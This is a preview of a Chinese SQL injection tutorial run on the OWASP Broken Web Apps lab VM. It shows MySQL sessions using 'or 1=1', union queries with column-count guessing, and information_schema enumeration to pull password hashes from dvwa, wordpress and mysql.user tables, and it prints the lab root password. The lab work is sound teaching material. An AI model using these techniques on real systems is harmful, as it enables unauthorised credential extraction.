没有合适的资源?快使用搜索试试~ 我知道了~
资源推荐
资源详情
资源评论
sql 注入-通过注入点漏洞获得数据库数据-kali-sqlmap
0.靶机 mysql 登录
# mysql -uroot -powaspbwa
1.sql 注入分类
手动注入和工具自动注入
2.两种重要的 sql 查询
1). or where 1=1 #只能查询该表的一张表
2). union 查询 #可构建联合查询,查询多张表
3.union 联合查询注意
1).前后查询是 sql 语句字段数量必须相同,数字能充当任何字段
1).可显示前面表值也可显示后面表值
3).能使用 union 联合查询猜测前面 sql 语句表的字段多少
4.简单的 sql 注入构建语句
1)使用 or 1=1 来构造语句:
mysql> select * from dvwa.users limit 2;
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
| user_id | first_name | last_name | user | password | avatar |
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | http://127.0.0.1/dvwa/hackable/users/admin.jpg |
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | http://127.0.0.1/dvwa/hackable/users/gordonb.jpg |
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
mysql> select user_id,first_name,last_name from dvwa.users where first_name='yangge';
Empty set (0.00 sec)
mysql> select user_id,first_name,last_name from dvwa.users where first_name='yangge' or 1=1 limit 2;
+---------+------------+-----------+
| user_id | first_name | last_name |
+---------+------------+-----------+
| 1 | admin | admin |
| 2 | Gordon | Brown |
+---------+------------+-----------+
2).union 联合查询:前后查询是 sql 语句字段数量必须相同,数字能充当任何字段—可显示前面表值也可后面表值
(1).显示的字段名是前面表的,显示的值也是前面表的
mysql> select user,password from mysql.user limit 2;
+------+-------------------------------------------+
| user | password |
+------+-------------------------------------------+
| root | *73316569DAC7839C2A784FF263F5C0ABBC7086E2 |
| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F |
+------+-------------------------------------------+
mysql> select user_login,user_pass from wordpress.wp_users limit 2;
+------------+----------------------------------+
| user_login | user_pass |
+------------+----------------------------------+
| admin | 21232f297a57a5a743894a0e4a801fc3 |
| user | ee11cbb19052e40b07aac0ca060c23ee |
+------------+----------------------------------+
mysql> select user,password from mysql.user union select user_login,1 from wordpress.wp_users limit 2;
+------+-------------------------------------------+
| user | password |
+------+-------------------------------------------+
| root | *73316569DAC7839C2A784FF263F5C0ABBC7086E2 |
| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F |
+------+-------------------------------------------+
(2).显示的字段名是前面表的,显示的值则是后面面表的——使用 where 1=2 构造前面 sql 语句的假条件
mysql> select user,password,host from mysql.user limit 2;
+------+-------------------------------------------+---------------+
| user | password | host |
+------+-------------------------------------------+---------------+
| root | *73316569DAC7839C2A784FF263F5C0ABBC7086E2 | localhost |
| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | brokenwebapps |
+------+-------------------------------------------+---------------+
mysql> select user_login,user_pass,user_nicename from wordpress.wp_users limit 2;
+------------+----------------------------------+---------------+
| user_login | user_pass | user_nicename |
+------------+----------------------------------+---------------+
| admin | 21232f297a57a5a743894a0e4a801fc3 | admin |
| user | ee11cbb19052e40b07aac0ca060c23ee | user |
+------------+----------------------------------+---------------+
mysql> select user,password,host from mysql.user where 1=2 union select user_login,user_pass,1 from wordpress.wp_users limit 2;
+-------+----------------------------------+------+
| user | password | host |
+-------+----------------------------------+------+
| admin | 21232f297a57a5a743894a0e4a801fc3 | 1 |
| user | ee11cbb19052e40b07aac0ca060c23ee | 1 |
+-------+----------------------------------+------+
(3).使用 union 联合查询猜测前面 sql 语句字段多少来查询前面表的数据
构造 union 查询,猜测出前面未知表 dvwa.users 有几个字段(6 个字段),并将未知表内容显示出来:
mysql> select * from dvwa.users;
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
| user_id | first_name | last_name | user | password | avatar |
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | http://127.0.0.1/dvwa/hackable/users/admin.jpg |
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | http://127.0.0.1/dvwa/hackable/users/gordonb.jpg |
| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | http://127.0.0.1/dvwa/hackable/users/1337.jpg |
| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://127.0.0.1/dvwa/hackable/users/pablo.jpg |
| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | http://127.0.0.1/dvwa/hackable/users/smithy.jpg |
| 6 | user | user | user | ee11cbb19052e40b07aac0ca060c23ee | http://127.0.0.1/dvwa/hackable/users/1337.jpg |
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
mysql> select * from dvwa.users union select 1;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from dvwa.users union select 1,2;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from dvwa.users union select 1,2,3;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from dvwa.users union select 1,2,3,4;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from dvwa.users union select 1,2,3,4,5;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from dvwa.users union select 1,2,3,4,5,6;
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
| user_id | first_name | last_name | user | password | avatar |
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | http://127.0.0.1/dvwa/hackable/users/admin.jpg |
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | http://127.0.0.1/dvwa/hackable/users/gordonb.jpg |
| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | http://127.0.0.1/dvwa/hackable/users/1337.jpg |
| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://127.0.0.1/dvwa/hackable/users/pablo.jpg |
| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | http://127.0.0.1/dvwa/hackable/users/smithy.jpg |
| 6 | user | user | user | ee11cbb19052e40b07aac0ca060c23ee | http://127.0.0.1/dvwa/hackable/users/1337.jpg |
| 1 | 2 | 3 | 4 | 5 | 6
|
+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+
5.数据库字典
1).数据库字典概述
保存了数据库里所有库,所有表,所有列的元数据信息。
该库不保存数据,只保存了信息有什么表,什么库,什么字段等,被称为数据库字典,该库是:information_schema.
2).常用的使用数据库字典查询相应信息
查询整个数据库里所有数据库名和表名:
mysql> select * from information_schema.tables\G #查到的 TABLE_SCHEMA:xx 是库名,TABLE_NAME:xx 是表名
只查询整个数据库里所有库名并去重:
mysql> select distinct table_schema from information_schema.tables;
只查询整个数据库里所有表名并去重:
mysql> select distinct table_name from information_schema.tables;
只查询某个库(mysql 库)里的所有的表:
mysql> select table_schema,table_name from information_schema.tables where table_schema='mysql';
分组查询:所有数据库里各自都有自己的什么表:
mysql> select table_schema,group_concat(table_name) from information_schema.tables group by table_schema\G
下面重要:
查询整个数据库里所有数据库名,所有表名,所有字段名:
mysql> select * from information_schema.columns limit 2\G
TABLE_SCHEMA: information_schema #库名
TABLE_NAME: CHARACTER_SETS #表名
COLUMN_NAME: CHARACTER_SET_NAME #字段名(列名)
查询整个数据库里所有数据库名—去重:
mysql> select distinct table_schema from information_schema.columns;
查询整个数据库里所有表名—去重:
mysql> select distinct table_name from information_schema.columns;
只查询某个库(mysql 库)里的所有的表—去重:
mysql> select distinct table_schema,table_name from information_schema.columns where table_schema='mysql';
分组查询:所有数据库里各自都有自己的什么表:
mysql> select table_schema,group_concat(table_name) from information_schema.columns group by table_schema\G
查询整个数据库里所有的列名:
mysql> select column_name from information_schema.columns;
只查询某个库的某个表的所有列名:(mysql 库的 user 表的所有列名)
mysql> select column_name from information_schema.columns where table_schema='mysql' and table_name='user';
3).使用数据库字典查询相应信息例子
查询整个数据库里所有数据库名,所有表名,所有字段名:
mysql> select * from information_schema.columns limit 2\G
*************************** 1. row ***************************
TABLE_CATALOG: NULL
TABLE_SCHEMA: information_schema #库名
TABLE_NAME: CHARACTER_SETS #表名
COLUMN_NAME: CHARACTER_SET_NAME #字段名(列名)
ORDINAL_POSITION: 1
COLUMN_DEFAULT:
IS_NULLABLE: NO
DATA_TYPE: varchar
CHARACTER_MAXIMUM_LENGTH: 32
CHARACTER_OCTET_LENGTH: 96
NUMERIC_PRECISION: NULL
NUMERIC_SCALE: NULL
CHARACTER_SET_NAME: utf8
COLLATION_NAME: utf8_general_ci
COLUMN_TYPE: varchar(32)
COLUMN_KEY:
EXTRA:
PRIVILEGES: select
COLUMN_COMMENT:
*************************** 2. row ***************************
TABLE_CATALOG: NULL
TABLE_SCHEMA: information_schema
TABLE_NAME: CHARACTER_SETS
COLUMN_NAME: DEFAULT_COLLATE_NAME
ORDINAL_POSITION: 2
COLUMN_DEFAULT:
IS_NULLABLE: NO
DATA_TYPE: varchar
CHARACTER_MAXIMUM_LENGTH: 32
CHARACTER_OCTET_LENGTH: 96
NUMERIC_PRECISION: NULL
NUMERIC_SCALE: NULL
CHARACTER_SET_NAME: utf8
COLLATION_NAME: utf8_general_ci
COLUMN_TYPE: varchar(32)
COLUMN_KEY:
EXTRA:
PRIVILEGES: select
COLUMN_COMMENT:
查询整个数据库里所有数据库名—去重:
mysql> select distinct table_schema from information_schema.columns limit 15;
+--------------------+
| table_schema |
+--------------------+
| information_schema |
| bricks |
| bwapp |
| citizens |
| cryptomg |
| dvwa |
剩余26页未读,继续阅读
资源评论
运维实战帮
- 粉丝: 78
- 资源: 420
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功